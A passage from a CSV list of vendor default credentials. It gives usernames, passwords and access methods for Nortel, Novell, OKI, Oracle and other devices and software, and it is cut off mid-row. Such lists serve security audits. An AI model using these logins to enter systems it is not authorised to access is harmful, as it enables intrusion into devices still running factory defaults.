CCR,,Multi,service,smile,general engineer account,,\nnortel,Meridian CCR,,User account,ccrusr,ccrusr,,,\nnortel,Meridian CCR,,engineer account,disttech,4tas,,,\nnortel,Meridian CCR,,general engineer account,service,smile,,,\nnortel,Meridian CCR,,telnet/modem,ccrusr,ccrusr,User account,,\nnortel,Meridian CCR,,telnet/modem,mlusr,mlusr,user account,,\nnortel,Meridian CCR,,telnet/modem,trmcnfg,trmcnfg,,,\nnortel,Meridian Integrated Conference Bridge,,,admin,,,,\nnortel,Meridian Integrated Conference Bridge,,,admin,000000,,,\nnortel,Meridian Integrated Conference Bridge,,,conferencing,admin,,,\nnortel,Meridian Integrated Conference Bridge,,,debug,gubed,,,\nnortel,Meridian KSU,,Console,**23646,23646,Admin,,\nnortel,Meridian KSU,,Console,**266344,266344,Config,,\nnortel,Meridian Link,,,disttech,4tas,,,\nnortel,Meridian Link,,,maint,maint,,,\nnortel,Meridian Link,,,mlusr,mlusr,,,\nnortel,Meridian Link,,,service,smile,,,\nnortel,Meridian Link,,Maintenance account,maint,maint,,,\nnortel,Meridian Link,,Multi,disttech,4tas,engineer account,,\nnortel,Meridian Link,,Multi,disttech,etas,engineer account,,\nnortel,Meridian Link,,Multi,maint,maint,Maintenance account,,\nnortel,Meridian Link,,Multi,service,smile,general engineer account,,\nnortel,Meridian Link,,engineer account,disttech,4tas,,,\nnortel,Meridian Link,,general engineer account,service,smile,,,\nnortel,Meridian Link,,telnet/modem,ccrusr,ccrusr,User account,,\nnortel,Meridian Link,,telnet/modem,mlusr,mlusr,user account,,\nnortel,Meridian Link,,telnet/modem,trmcnfg,trmcnfg,,,\nnortel,Meridian Link,,user account,mlusr,mlusr,,,\nnortel,Meridian Link/CCR/Max,,,ccrusr,ccrusr,,,\nnortel,Meridian Link/CCR/Max,,,disttech,4tas,,,\nnortel,Meridian Link/CCR/Max,,,disttech,disttech,,,\nnortel,Meridian Link/CCR/Max,,,maint,maint,,,\nnortel,Meridian Link/CCR/Max,,,mlusr,mlusr,,,\nnortel,Meridian Link/CCR/Max,,,service,smile,,,\nnortel,Meridian Link/CCR/Max,,,trmcnfg,trmcnfg,,,\nnortel,Meridian MAX,,,maint,ntacdmax,,,\nnortel,Meridian MAX,,,root,3ep5w2u,,,\nnortel,Meridian MAX,,,service,smile,,,\nnortel,Meridian MAX,,Admin,root,3ep5w2u,,,\nnortel,Meridian MAX,,Maintenance account,maint,ntacdmax,,,\nnortel,Meridian MAX,,general engineer account,service,smile,,,\nnortel,Meridian Mail,10.xx,AX in serial,admin,admin,Admin,,\nnortel,Meridian Mail,13.xx,AX in serial,system,adminpwd,Admin,,\nnortel,Meridian Max,,Multi,maint,maint,Maintenance account,,\nnortel,Meridian Max,,Multi,maint,ntacdmax,Maintenance account,,\nnortel,Meridian Max,,Multi,root,3ep5w2u,Admin,,\nnortel,Meridian Max,,Multi,service,smile,general engineer account,,\nnortel,Meridian Max,,telnet/modem,disttech,4tas,,,\nnortel,Meridian Max,,telnet/modem,disttech,etas,,,\nnortel,Meridian Max,,telnet/modem,mlusr,mlusr,user account,,\nnortel,Meridian Max,,telnet/modem,trmcnfg,trmcnfg,,,\nnortel,Meridian Max,,telnet/moden,ccrusr,ccrusr,User account,,\nnortel,Meridian PBX,,,login,0,,,\nnortel,Meridian PBX,,,login,0000,,,\nnortel,Meridian PBX,,,login,1111,,,\nnortel,Meridian PBX,,,login,8429,,,\nnortel,Meridian PBX,,,spcl,0,,,\nnortel,Meridian PBX,,,spcl,0000,,,\nnortel,Meridian PBX,,Serial,login,0,,,\nnortel,Meridian PBX,,Serial,login,0,,AUTH codes in LD 8,\nnortel,Meridian PBX,,Serial,login,0000,,,\nnortel,Meridian PBX,,Serial,login,1111,,AUTH codes in LD 8,\nnortel,Meridian PBX,,Serial,login,8429,,AUTH codes in LD 8,\nnortel,Meridian PBX,,Serial,spcl,0,,,\nnortel,Meridian PBX,,Serial,spcl,0,,AUTH codes in LD 8,\nnortel,Meridian PBX,,Serial,spcl,0000,,,\nnortel,Meridian,,,,,,,\nnortel,Meridian,,Admin,,,,,\nnortel,Meridian,,Multi,,,Admin,,\nnortel,Millennium,,keypad while hung up,,2727378,Maintenance,,\nnortel,Norstar Modular ICS,,,**ADMIN (**23646),ADMIN (23646),,Any,\nnortel,Norstar Modular ICS,,,**CONFIG (266344),CONFIG (266344),,Any,\nnortel,Norstar,,Console,266344,266344,Admin,,\nnortel,Phone System,All,From Phone,,266344,Installers,,\nnortel,Remote Office 9150,,,admin,root,,,\nnortel,Remote Office 9150,,Admin,admin,root,,,\nnortel,Remote Office 9150,,Client,admin,root,Admin,,\nnortel,Shasta,,,admin,admin,,any,\nnortel,Symposium,,,sysadmin,nortel,,,\nnortel,Symposium,,,sysadmin,nortel,Admin,,\nnortel,dms,,Multi,,,Admin,,\nnortel,p8600,,Multi,,,Admin,,\nnovatel,MiFi 2352,,192.168.1.1,admin,admin,Admin,,\nnovell,Groupwise 5.5 Enhancement Pack,,,servlet,manager,,,\nnovell,Groupwise 6.0,,,servlet,manager,,,\nnovell,Groupwise,,5.5 Enhancement Pack,servlet,manager,,,\nnovell,Groupwise,,6,servlet,manager,,,\nnovell,Groupwise,,Servlet Mgr,servlet,manager,,,\nnovell,Groupwise,5.5 Enhancement Pack,HTTP,servlet,manager,Servlet Mgr,,\nnovell,Groupwise,6,HTTP,servlet,manager,Servlet Mgr,,\nnovell,Groupwise,6.0,HTTP,servlet,manager,Servlet Mgr,,\nnovell,NDS iMonitor,,,sadmin,,,,\nnovell,NDS iMonitor,,http,sadmin,,Admin,,\nnovell,NetWare,,,BACKUP,,,Any,\nnovell,NetWare,,,CHEY_ARCHSVR,WONDERLAND,,Arcserve,\nnovell,NetWare,,,GATE,,,Any,\nnovell,NetWare,,,GATEWAY,,,Any,\nnovell,NetWare,,,HPLASER,,,Any,\nnovell,NetWare,,,LASER,,,Any,\nnovell,NetWare,,,LASERWRITER,,,Any,\nnovell,NetWare,,,MAIL,,,Any,\nnovell,NetWare,,,POST,,,Any,\nnovell,NetWare,,,PRINT,,,any,\nnovell,NetWare,,,PRINTER,,,Any,\nnovell,NetWare,,,ROUTER,,,Any,\nnovell,NetWare,,,WINDOWS_PASSTHRU,,,Any,\nnovell,NetWare,,,guest,,,Any,\nnovell,Netware,,,ADMIN,,,,\nnovell,Netware,,,ADMIN,ADMIN,,,\nnovell,Netware,,,ARCHIVIST,,,,\nnovell,Netware,,,ARCHIVIST,ARCHIVIST,,,\nnovell,Netware,,,BACKUP,,,,\nnovell,Netware,,,BACKUP,BACKUP,,,\nnovell,Netware,,,CHEY_ARCHSVR,,,,\nnovell,Netware,,,CHEY_ARCHSVR,CHEY_ARCHSVR,,,\nnovell,Netware,,,FAX,,,,\nnovell,Netware,,,FAX,FAX,,,\nnovell,Netware,,,FAXUSER,,,,\nnovell,Netware,,,FAXUSER,FAXUSER,,,\nnovell,Netware,,,FAXWORKS,,,,\nnovell,Netware,,,FAXWORKS,FAXWORKS,,,\nnovell,Netware,,,GATEWAY,,,,\nnovell,Netware,,,GATEWAY,GATEWAY,,,\nnovell,Netware,,,GUEST,,,,\nnovell,Netware,,,GUEST,GUEST,,,\nnovell,Netware,,,GUEST,GUESTGUE,,,\nnovell,Netware,,,GUEST,GUESTGUEST,,,\nnovell,Netware,,,GUEST,TSEUG,,,\nnovell,Netware,,,HPLASER,,,,\nnovell,Netware,,,HPLASER,HPLASER,,,\nnovell,Netware,,,LASER,,,,\nnovell,Netware,,,LASER,LASER,,,\nnovell,Netware,,,LASERWRITER,,,,\nnovell,Netware,,,LASERWRITER,LASERWRITER,,,\nnovell,Netware,,,MAIL,,,,\nnovell,Netware,,,MAIL,MAIL,,,\nnovell,Netware,,,POST,,,,\nnovell,Netware,,,POST,POST,,,\nnovell,Netware,,,PRINT,,,,\nnovell,Netware,,,PRINT,PRINT,,,\nnovell,Netware,,,PRINTER,,,,\nnovell,Netware,,,PRINTER,PRINTER,,,\nnovell,Netware,,,ROOT,,,,\nnovell,Netware,,,ROOT,ROOT,,,\nnovell,Netware,,,ROUTER,,,,\nnovell,Netware,,,SABRE,,,,\nnovell,Netware,,,SUPERVISOR,,,,\nnovell,Netware,,,SUPERVISOR,HARRIS,,,\nnovell,Netware,,,SUPERVISOR,NETFRAME,,,\nnovell,Netware,,,SUPERVISOR,NF,,,\nnovell,Netware,,,SUPERVISOR,NFI,,,\nnovell,Netware,,,SUPERVISOR,SUPERVISOR,,,\nnovell,Netware,,,SUPERVISOR,SYSTEM,,,\nnovell,Netware,,,TEST,,,,\nnovell,Netware,,,TEST,TEST,,,\nnovell,Netware,,,USER_TEMPLATE,,,,\nnovell,Netware,,,USER_TEMPLATE,USER_TEMPLATE,,,\nnovell,Netware,,,WANGTEK,,,,\nnovell,Netware,,,WANGTEK,WANGTEK,,,\nnovell,Netware,,,WINDOWS_PASSTHRU,,,,\nnovell,Netware,,,WINDOWS_PASSTHRU,WINDOWS_PASSTHRU,,,\nnovell,Netware,,,WINSABRE,SABRE,,,\nnovell,Netware,,,WINSABRE,WINSABRE,,,\nnovell,Netware,,Multi,ADMIN,,,,\nnovell,Netware,,Multi,ADMIN,ADMIN,,,\nnovell,Netware,,Multi,ARCHIVIST,,,,\nnovell,Netware,,Multi,ARCHIVIST,ARCHIVIST,,,\nnovell,Netware,,Multi,BACKUP,,,,\nnovell,Netware,,Multi,BACKUP,BACKUP,,,\nnovell,Netware,,Multi,CHEY_ARCHSVR,,,,\nnovell,Netware,,Multi,CHEY_ARCHSVR,CHEY_ARCHSVR,,,\nnovell,Netware,,Multi,FAX,,,,\nnovell,Netware,,Multi,FAX,FAX,,,\nnovell,Netware,,Multi,FAXUSER,,,,\nnovell,Netware,,Multi,FAXUSER,FAXUSER,,,\nnovell,Netware,,Multi,FAXWORKS,,,,\nnovell,Netware,,Multi,FAXWORKS,FAXWORKS,,,\nnovell,Netware,,Multi,GATEWAY,,,,\nnovell,Netware,,Multi,GATEWAY,GATEWAY,,,\nnovell,Netware,,Multi,GUEST,,,,\nnovell,Netware,,Multi,GUEST,GUEST,,,\nnovell,Netware,,Multi,GUEST,GUESTGUE,,,\nnovell,Netware,,Multi,GUEST,GUESTGUEST,,,\nnovell,Netware,,Multi,GUEST,TSEUG,,,\nnovell,Netware,,Multi,HPLASER,,,,\nnovell,Netware,,Multi,HPLASER,HPLASER,,,\nnovell,Netware,,Multi,LASER,,,,\nnovell,Netware,,Multi,LASER,LASER,,,\nnovell,Netware,,Multi,LASERWRITER,,,,\nnovell,Netware,,Multi,LASERWRITER,LASERWRITER,,,\nnovell,Netware,,Multi,MAIL,,,,\nnovell,Netware,,Multi,MAIL,MAIL,,,\nnovell,Netware,,Multi,POST,,,,\nnovell,Netware,,Multi,POST,POST,,,\nnovell,Netware,,Multi,PRINT,,,,\nnovell,Netware,,Multi,PRINT,PRINT,,,\nnovell,Netware,,Multi,PRINTER,,,,\nnovell,Netware,,Multi,PRINTER,PRINTER,,,\nnovell,Netware,,Multi,ROOT,,,,\nnovell,Netware,,Multi,ROOT,ROOT,,,\nnovell,Netware,,Multi,ROUTER,,,,\nnovell,Netware,,Multi,SABRE,,,,\nnovell,Netware,,Multi,SUPERVISOR,,,,\nnovell,Netware,,Multi,SUPERVISOR,HARRIS,,,\nnovell,Netware,,Multi,SUPERVISOR,NETFRAME,,,\nnovell,Netware,,Multi,SUPERVISOR,NF,,,\nnovell,Netware,,Multi,SUPERVISOR,NFI,,,\nnovell,Netware,,Multi,SUPERVISOR,SUPERVISOR,,,\nnovell,Netware,,Multi,SUPERVISOR,SYSTEM,,,\nnovell,Netware,,Multi,TEST,,,,\nnovell,Netware,,Multi,TEST,TEST,,,\nnovell,Netware,,Multi,USER_TEMPLATE,,,,\nnovell,Netware,,Multi,USER_TEMPLATE,USER_TEMPLATE,,,\nnovell,Netware,,Multi,WANGTEK,,,,\nnovell,Netware,,Multi,WANGTEK,WANGTEK,,,\nnovell,Netware,,Multi,WINDOWS_PASSTHRU,,,,\nnovell,Netware,,Multi,WINDOWS_PASSTHRU,WINDOWS_PASSTHRU,,,\nnovell,Netware,,Multi,WINSABRE,SABRE,,,\nnovell,Netware,,Multi,WINSABRE,WINSABRE,,,\nnovell,Vibe,,,admin,admin,,,\nnovell,iChain,,1.5,,san fran 8,,,\nnovell,iChain,,2,,cr0wmt 911,,,\nnovell,iChain,,Admin,,cr0wmt 911,,,\nnovell,iChain,,Admin,,san fran 8,,,\nnovell,iChain,1.5,Console,,san fran 8,Admin,,\nnovell,iChain,2,Console,,cr0wmt 911,Admin,,\nnovell,iChain,2.0,Console,,cr0wmt 911,Admin,,\nnovell,iChain/ICS,,1.2 2.0,,root,,,\nnovell,iChain/ICS,,Admin,,root,,,\nnovell,iChain/ICS,1.2 2.0,Telnet,,root,Admin,,\nnovell,iManager,,2.0.1,admin,novell,,,\nnovell,iManager,2.0.1,,,admin,novell,,\nnovell,iManager,2.0.1,,admin,novell,Admin,,\nnrg,DSC338 Printer,1.19,HTTP,,password,Admin,no user,\nnrg,SP C312DN,1.03,,Admin,,Administrator,,\nnsi,vmXfw,,,root,nsi,Admin,,\nnullsoft,Shoutcast,1.9.5,PLS,admin,changeme,Admin,,\nnurit,PC BIOS,,,$system,,,,\nnurit,PC BIOS,,Admin,$system,,,,\nnurit,PC BIOS,,Console,$system,,Admin,,\noce,,,http,administrator,12345678,administrator,,\noce,Printers,,Admin,,0 and the number of OCE printer,,,\noce,Printers,Hardware,HTTP,,0 and the number of OCE printer,Admin,,\noce,TCS500,All Versions,Console,oceservice,ser4OCE!,Technical/Admin,Reboot for normal user mode.,\noce,TDS300,ALL,Direct,guest,RtFM!,,,\noce,TDS320,,console,System Administrator,SysAdm,,,\noce,TDS450,,,oceservice,ser4OCE!,tech/admin,,\noce,cm4010,,Web Console via IP Address,Administrator,admin,administrator level,,\noce,tcs500, Windows XP, all models,12.3.0(1668),console, http://192.168.0.81,,\noce,tcs500,Windows XP,all models,12.3.0(1668),console,http://192.168.0.81,,\nods,1094 IS Chassis,,,ods,ods,,4.x,\nods,1094,,,ods,ods,,,\noki,B411,all ver,Http or AdminManager,root,aaaaaa,Administrator,,\noki,B431,all ver,Http or AdminManager,root,aaaaaa,Administrator,,\noki,B431dn,,http://192.168.1.xxx,root,123456,Admin,,\noki,B6100n,,,admin,OkiLAN,admin,with 61e(NIC),\noki,B6200n,,,admin,OkiLAN,admin,with 62e(NIC),\noki,B6300n,,,admin,OkiLAN,admin,with 62e(NIC),\noki,B710,all,http://192.168.1.33,root,aaaaaa,Administrator,,\noki,B720,all,http://192.168.1.33,root,aaaaaa,Administrator,,\noki,B720N,All versions,Web interface,root,aaaaaa,Root access,,\noki,B730,all,http://192.168.1.33,root,aaaaaa,Administrator,,\noki,B8300n,,,admin,OkiLAN,admin,with 83e(NIC),\noki,C330,all versions etc.,http://192.168.0.1,root,aaaaaa,Admin,Administrator,\noki,C3450,,http://192.168.1.50,admin,heslo,admin,,\noki,C530dn,A1.02,http://192.168.1.51,root,aaaaaa,Admin,,\noki,C5550 MFP,,http,,*blank*,Admin,,\noki,C5650dn,,,,000000,menu,,\noki,C5650n,,,,000000,menu,,\noki,C6050dn,,,,000000,menu,,\noki,C6050n,,,,000000,menu,,\noki,C610,,,admin,aaaaaa,admin,,\noki,C6150dn,,,,000000,menu,,\noki,C6150dtn,,,,000000,menu,,\noki,C6150hdn,,,,000000,menu,,\noki,C6150n,,,,000000,menu,,\noki,C7000,,,admin,OkiLAN,admin,with 6200e(NIC),\noki,C711,,Web,admin,aaaaaa,Admin access,,\noki,C9000,,,admin,OkiLAN,admin,with 6200e(NIC),\noki,C9650,,,,0000,Print statistics,,\noki,C9650,,,,aaaaaa,Administration,,\noki,C9655,,printer menu,,aaaaaa,printer menubutton,,\noki,CX1145,,,,123456,,,\noki,CX2032 MFP,,http,,*blank*,Admin,,\noki,CX2033,,Printer Menu,,,,When asked for password just press OK,\noki,CX2633,,Web interface,admin,aaaaaa,admin,,\noki,CX2731,,Web interface,admin,aaaaaa,admin,,\noki,Color 8 +14ex,,,admin,OkiLAN,admin,with 6100e(NIC),\noki,ES5460 MFP,,Local configuration menu,,aaaaaa,Admin/Root i guess,,\noki,ES7120,,Web,root,aaaaaa,Admin,,\noki,ES7411,,web HTTP,admin,aaaaaa,Administrator,,\noki,ES8460,,http,admin,aaaaaa,,,\noki,MB460,,,root,aaaaaa,,,\noki,MB470,,,root,aaaaaa,,,\noki,MB480,,,root,aaaaaa,,,\noki,MC160,,Op Panel,,000000,Admin,,\noki,MC160,,Web,,sysAdmin,Admin,,\noki,MC342w,,,admin,aaaaaa,admin,,\noki,MC360,,Console,admin,aaaaaa,Full acces to printer configuration,,\noki,MC361,,Web interface,admin,aaaaaa,admin,,\noki,MC560,,Printer Menu,,,,When asked for password just press OK,\noki,MC560,,Printer Menu,,,,When asked for password,\noki,MC561,,Web interface,admin,aaaaaa,admin,,\noki,MC561dn,,http://,admin,aaaaaa,,,\noki,MC860,,Web interface,admin,aaaaaa,admin,,\noki,ML3xx,,,admin,OkiLAN,admin,with 6010e(NIC),6020e(NIC)\noki,ML491n,,http://,Admin,OkiLAN,Admin,,\noki,ML4xx,,,admin,OkiLAN,admin,with 6010e(NIC),6020e(NIC)\noki,N22113B,A2.00,http://192.168.1.9,,noe,Admin,,\noki,WebTools,,,Administrator,,,,\noki,b710,all,http://192.168.1.33,root,aaaaaa,Administrator,,\noki,c511dn,B7.00,,admin,aaaaaa,Full administrator Access,the machine picks up dhcp address,manually configure static on machine directly if required or print a config page to get the dhcp address that was assigned.\noki,c5750,n1.02,http://192.168.0.200,,,,,\noki,c810,1.0,192.100.185.78,admin,admin,admin,,\nolegkhabarov,Comfy CMS,,,username,password,,,\nolicom,8600,,9600,-,AaBbCcDd,,,\nolicom,8600,all,Serial,-,AaBbCcDd,9600,,\nolitec,sx 200 adsl modem router,,Multi,admin,adslolitec,Admin,default ip 192.168.0.250,\nolitec,sx 202 adsl modem router,,HTTP,admin,admin,Admin,Firmware: 2.7.0.9(UE0.B1C)3.3.0.23,\nomnitronix,Data-Link,DL150,Multi,,SMDR,Admin,,\nomnitronix,Data-Link,DL150,Multi,,SUPER,Admin,,\nomron,MR104FH,,Multi,,,Admin,,\noodie.com,odfaq,,admin,admin,admin,,,\noodiecom,odfaq,2.1.0,HTTP,admin,admin,admin,,\nopenconnect,OC://WebConnect Pro,,Multi,admin,OCS,Admin,,\nopenconnect,OC://WebConnect Pro,,Multi,adminstat,OCS,Admin,,\nopenconnect,OC://WebConnect Pro,,Multi,adminuser,OCS,Admin,,\nopenconnect,OC://WebConnect Pro,,Multi,adminview,OCS,Admin,,\nopenconnect,OC://WebConnect Pro,,Multi,helpdesk,OCS,Admin,,\nopengear,ACM5004-G,,192.168.0.1,root,default,Admin,,\nopenlink,Administration Assistant,,,admin,admin,,,\nopenmarket,Content Server,,,Bobo,hello,,,\nopenmarket,Content Server,,,Coco,hello,,,\nopenmarket,Content Server,,,Flo,hello,,,\nopenmarket,Content Server,,,Joe,hello,,,\nopenmarket,Content Server,,,Moe,hello,,,\nopenmarket,Content Server,,,admin,demo,,,\nopenmarket,Content Server,,,user_analyst,demo,,,\nopenmarket,Content Server,,,user_approver,demo,,,\nopenmarket,Content Server,,,user_author,demo,,,\nopenmarket,Content Server,,,user_checker,demo,,,\nopenmarket,Content Server,,,user_designer,demo,,,\nopenmarket,Content Server,,,user_editor,demo,,,\nopenmarket,Content Server,,,user_expert,demo,,,\nopenmarket,Content Server,,,user_marketer,demo,,,\nopenmarket,Content Server,,,user_pricer,demo,,,\nopenmarket,Content Server,,,user_publisher,demo,,,\nopenmarket,Content Server,,http,Admin,demo,Admin,,\nopenmarket,Content Server,,http,Bobo,hello,,,\nopenmarket,Content Server,,http,Coco,hello,,,\nopenmarket,Content Server,,http,Flo,hello,,,\nopenmarket,Content Server,,http,Joe,hello,,,\nopenmarket,Content Server,,http,Moe,hello,,,\nopenmarket,Content Server,,http,user_analyst,demo,,,\nopenmarket,Content Server,,http,user_approver,demo,,,\nopenmarket,Content Server,,http,user_author,demo,,,\nopenmarket,Content Server,,http,user_checker,demo,,,\nopenmarket,Content Server,,http,user_designer,demo,,,\nopenmarket,Content Server,,http,user_editor,demo,,,\nopenmarket,Content Server,,http,user_expert,demo,,,\nopenmarket,Content Server,,http,user_marketer,demo,,,\nopenmarket,Content Server,,http,user_pricer,demo,,,\nopenmarket,Content Server,,http,user_publisher,demo,,,\nopenmediavault,OpenMediaVault,,,admin,openmediavault,Web UI Admin,,\nopenmediavault,OpenMediaVault,,,root,openmediavault,root,,\nopennetworks,501R,,192.168.0.1,root,root,Admin,,\nopennetworks,531R,,,root,root,Admin,,\nopennetworks,812L,,192.168.10.1,root,0P3N,Admin,Password contains numeric zero not letter O - case sensitive,\nopennetworks,824RLW,,192.168.1.254,admin,admin,Admin,,\nopennetworks,EasyChat 210,,,root,0P3N,Admin,Password contains numeric zero not letter O - case sensitive,\nopennetworks,iConnectAccess 611,,192.168.1.254,root,0P3N,Admin,Password contains numeric zero not letter O - case sensitive,\nopennetworks,iConnectAccess 612,,192.168.1.254,root,0P3N,Admin,Password contains numeric zero not letter O - case sensitive,\nopennetworks,iConnectAccess 621,,192.168.1.254 or 192.168.1.1,admin,password,Admin,,\nopennetworks,iConnectAccess 621,,192.168.1.254 or 192.168.1.1,root,0P3N,Admin,Password contains numeric zero not letter O - case sensitive,\nopennetworks,iConnectAccess 622,,192.168.1.254,root,0P3N,Admin,Password contains numeric zero not letter O - case sensitive,\nopennetworks,iConnectAccess 624,,192.168.1.254,root,0P3N,Admin,Password contains numeric zero not letter O - case sensitive,\nopennetworks,iConnectAccess 624W,,192.168.1.254,root,0P3N,Admin,Password contains numeric zero not letter O - case sensitive,\nopennetworks,iConnectAccess 625,,192.168.1.254,root,0P3N,Admin,Password contains numeric zero not letter O - case sensitive,\nopennetworks,iConnectAccess 625W,,192.168.1.254,root,0P3N,Admin,Password contains numeric zero not letter O - case sensitive,\nopenwave,MSP,,Admin,cac_admin,cacadmin,,,\nopenwave,MSP,,Any,cac_admin,cacadmin,,,\nopenwave,MSP,Any,HTTP,cac_admin,cacadmin,Admin,,\nopenwave,WAP Gateway,,Admin,sys,uplink,,,\nopenwave,WAP Gateway,,Any,sys,uplink,,,\nopenwave,WAP Gateway,Any,HTTP,sys,uplink,Admin,,\nopenxchange,Open-Xchange LDAP,Open source versions below 0.8.2,,mailadmin,secret,high risk,,\nopenxchange,Open-Xchange Server,5,,mailadmin,secret,Admin,,\noptivision,Nac 3000 4000,,,root,mpegvideo,,any,\noptivision,Nac 3000 & 4000,,,root,mpegvideo,,any,\noptivision,Nac 3000,,,root,mpegvideo,,,\noptus,Counter-Strike,,1.3,Administrator,admin,,,\noptus,Counter-Strike,,Admin,Administrator,admin,,,\noptus,Counter-Strike,1.3,Multi,Administrator,admin,Admin,,\noracle corporation,Oracle,,,ABM,ABM,,,\noracle corporation,Oracle,,,ADAMS,WOOD,,,\noracle corporation,Oracle,,,ADLDEMO,ADLDEMO,,,\noracle corporation,Oracle,,,ADMIN,JETSPEED,,,\noracle corporation,Oracle,,,ADMINISTRATOR,ADMIN,,,\noracle corporation,Oracle,,,AHL,AHL,,,\noracle corporation,Oracle,,,AHM,AHM,,,\noracle corporation,Oracle,,,AK,AK,,,\noracle corporation,Oracle,,,ALHRO,XXX,,,\noracle corporation,Oracle,,,ALHRW,XXX,,,\noracle corporation,Oracle,,,ALR,ALR,,,\noracle corporation,Oracle,,,AMS,AMS,,,\noracle corporation,Oracle,,,AMV,AMV,,,\noracle corporation,Oracle,,,ANDY,SWORDFISH,,,\noracle corporation,Oracle,,,ANONYMOUS,ANONYMOUS,,,\noracle corporation,Oracle,,,AP,AP,,,\noracle corporation,Oracle,,,APPLMGR,APPLMGR,,,\noracle corporation,Oracle,,,APPLSYS,FND,,,\noracle corporation,Oracle,,,APPLSYSPUB,FNDPUB,,,\noracle corporation,Oracle,,,APPLYSYSPUB,PUB,,,\noracle corporation,Oracle,,,APPS,APPS,,,\noracle corporation,Oracle,,,APPS_MRC,APPS,,,\noracle corporation,Oracle,,,APPUSER,APPPASSWORD,,,\noracle corporation,Oracle,,,AQ,AQ,,,\noracle corporation,Oracle,,,AQDEMO,AQDEMO,,,\noracle corporation,Oracle,,,AQJAVA,AQJAVA,,,\noracle corporation,Oracle,,,AQUSER,AQUSER,,,\noracle corporation,Oracle,,,AR,AR,,,\noracle corporation,Oracle,,,ASF,ASF,,,\noracle corporation,Oracle,,,ASG,ASG,,,\noracle corporation,Oracle,,,ASL,ASL,,,\noracle corporation,Oracle,,,ASO,ASO,,,\noracle corporation,Oracle,,,ASP,ASP,,,\noracle corporation,Oracle,,,AST,AST,,,\noracle corporation,Oracle,,,ATM,SAMPLEATM,,,\noracle corporation,Oracle,,,AUDIOUSER,AUDIOUSER,,,\noracle corporation,Oracle,,,AURORA$JIS$UTILITY$,INVALID,,,\noracle corporation,Oracle,,,AURORA$ORB$UNAUTHENTICATED,,,,\noracle corporation,Oracle,,,AX,AX,,,\noracle corporation,Oracle,,,AZ,AZ,,,\noracle corporation,Oracle,,,BC4J,BC4J,,,\noracle corporation,Oracle,,,BEN,BEN,,,\noracle corporation,Oracle,,,BIC,BIC,,,\noracle corporation,Oracle,,,BIL,BIL,,,\noracle corporation,Oracle,,,BIM,BIM,,,\noracle corporation,Oracle,,,BIS,BIS,,,\noracle corporation,Oracle,,,BIV,BIV,,,\noracle corporation,Oracle,,,BIX,BIX,,,\noracle corporation,Oracle,,,BLAKE,PAPER,,,\noracle corporation,Oracle,,,BLEWIS,BLEWIS,,,\noracle corporation,Oracle,,,BOM,BOM,,,\noracle corporation,Oracle,,,BRIO_ADMIN,BRIO_ADMIN,,,\noracle corporation,Oracle,,,BRUGERNAVN,ADGANGSKODE,,,\noracle corporation,Oracle,,,BRUKERNAVN,PASSWORD,,,\noracle corporation,Oracle,,,BSC,BSC,,,\noracle corporation,Oracle,,,BUG_REPORTS,BUG_REPORTS,,,\noracle corporation,Oracle,,,CALVIN,HOBBES,,,\noracle corporation,Oracle,,,CATALOG,CATALOG,,,\noracle corporation,Oracle,,,CCT,CCT,,,\noracle corporation,Oracle,,,CDEMO82,UNKNOWN,,,\noracle corporation,Oracle,,,CDEMOCOR,CDEMOCOR,,,\noracle corporation,Oracle,,,CDEMORID,CDEMORID,,,\noracle corporation,Oracle,,,CDEMOUCB,CDEMOUCB,,,\noracle corporation,Oracle,,,CDOUGLAS,CDOUGLAS,,,\noracle corporation,Oracle,,,CE,CE,,,\noracle corporation,Oracle,,,CENTRA,CENTRA,,,\noracle corporation,Oracle,,,CENTRAL,CENTRAL,,,\noracle corporation,Oracle,,,CIDS,CIDS,,,\noracle corporation,Oracle,,,CIS,ZWERG,,,\noracle corporation,Oracle,,,CISINFO,ZWERG,,,\noracle corporation,Oracle,,,CLARK,CLOTH,,,\noracle corporation,Oracle,,,CLKANA,,,,\noracle corporation,Oracle,,,CLKRT,,,,\noracle corporation,Oracle,,,CN,CN,,,\noracle corporation,Oracle,,,COMPANY,COMPANY,,,\noracle corporation,Oracle,,,COMPIERE,COMPIERE,,,\noracle corporation,Oracle,,,CQSCHEMAUSER,PASSWORD,,,\noracle corporation,Oracle,,,CQUSERDBUSER,PASSWORD,,,\noracle corporation,Oracle,,,CRP,CRP,,,\noracle corporation,Oracle,,,CS,CS,,,\noracle corporation,Oracle,,,CSC,CSC,,,\noracle corporation,Oracle,,,CSD,CSD,,,\noracle corporation,Oracle,,,CSE,CSE,,,\noracle corporation,Oracle,,,CSF,CSF,,,\noracle corporation,Oracle,,,CSI,CSI,,,\noracle corporation,Oracle,,,CSL,CSL,,,\noracle corporation,Oracle,,,CSMIG,CSMIG,,,\noracle corporation,Oracle,,,CSP,CSP,,,\noracle corporation,Oracle,,,CSR,CSR,,,\noracle corporation,Oracle,,,CSS,CSS,,,\noracle corporation,Oracle,,,CTXDEMO,CTXDEMO,,,\noracle corporation,Oracle,,,CTXSYS,UNKNOWN,,,\noracle corporation,Oracle,,,CUA,CUA,,,\noracle corporation,Oracle,,,CUE,CUE,,,\noracle corporation,Oracle,,,CUF,CUF,,,\noracle corporation,Oracle,,,CUG,CUG,,,\noracle corporation,Oracle,,,CUI,CUI,,,\noracle corporation,Oracle,,,CUN,CUN,,,\noracle corporation,Oracle,,,CUP,CUP,,,\noracle corporation,Oracle,,,CUS,CUS,,,\noracle corporation,Oracle,,,CZ,CZ,,,\noracle corporation,Oracle,,,DATA_SCHEMA,LASKJDF098KSDAF09,,,\noracle corporation,Oracle,,,DBI,MUMBLEFRATZ,,,\noracle corporation,Oracle,,,DBSNMP,DBSNMP,,,\noracle corporation,Oracle,,,DBVISION,DBVISION,,,\noracle corporation,Oracle,,,DCM,,,,\noracle corporation,Oracle,,,DDIC,199220706,,,\noracle corporation,Oracle,,,DEMO,DEMO,,,\noracle corporation,Oracle,,,DEMO8,DEMO8,,,\noracle corporation,Oracle,,,DEMO9,DEMO9,,,\noracle corporation,Oracle,,,DES,DES,,,\noracle corporation,Oracle,,,DES2K,DES2K,,,\noracle corporation,Oracle,,,DEV2000_DEMOS,DEV2000_DEMOS,,,\noracle corporation,Oracle,,,DIANE,PASSWO1,,,\noracle corporation,Oracle,,,DIP,DIP,,,\noracle corporation,Oracle,,,DISCOVERER5,,,,\noracle corporation,Oracle,,,DISCOVERER_ADMIN,DISCOVERER_ADMIN,,,\noracle corporation,Oracle,,,DMSYS,DMSYS,,,\noracle corporation,Oracle,,,DPF,DPFPASS,,,\noracle corporation,Oracle,,,DSGATEWAY,,,,\noracle corporation,Oracle,,,DSSYS,DSSYS,,,\noracle 